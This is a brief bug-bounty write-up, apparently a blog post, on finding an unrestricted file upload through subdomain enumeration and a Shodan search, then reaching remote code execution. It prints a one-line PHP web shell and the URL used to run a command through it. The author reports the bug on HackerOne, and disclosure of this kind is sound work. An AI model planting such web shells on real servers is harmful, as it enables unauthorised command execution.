File Upload (RCE) to Bounty | HackerOne

#$ubh@nk@r
2 min readOct 1, 2024

--

Intro : Hello Hacker’s😀 what’s up! After a Long Time. Hope you are all Fine. Today I am gonna show you how do I get an RCE Vulnerability in an Endpoint that Leads me to Huge Bounty. So let’s Dive into it.

So it’s a Private Program in Hackerone. So I started with Subdomain Enumeration.

subfinder -d domain.com > subs.txt

Hacking with Shodan :

Then I search for the Domain in Shodan. I used the following Dork.

hostname:"domain.com" 200 [Set Search Query to http.title]

I have found some domain but from them I got a Domain where I can Upload any types of File.

And this is running on 8443 Port.

https://something.stb.domain.com:8443/ 

Upload → RCE :

So I upload a simple PHP Script for Remote Command Execution.

<?php system($_GET['cmd']); ?>

And it uploaded in uploads Folder. And I tried to Execute Command.

https://something.stb.domain.com:8443/uploads/test.php?cmd=id

And I got the below Response.

Reporting :

So I reported that Bug on Hackerone and they accepted it as a Valid One and Rewarded me with Bounty after 3 days.

So that’s it for today. Hope you learn something new!!

THANKS FOR READING!

If you enjoy this don’t forget to Like it and Follow me for more Articles.

Linkedin Profile → https://www.linkedin.com/in/subhankar-paul-332085254/

Happy Hacking~

--

--

#$ubh@nk@r
#$ubh@nk@r

Written by #$ubh@nk@r

CyberSecurity Learner, CTF Player, Noob Bug Hunter https://starlox0.github.io/

Responses (5)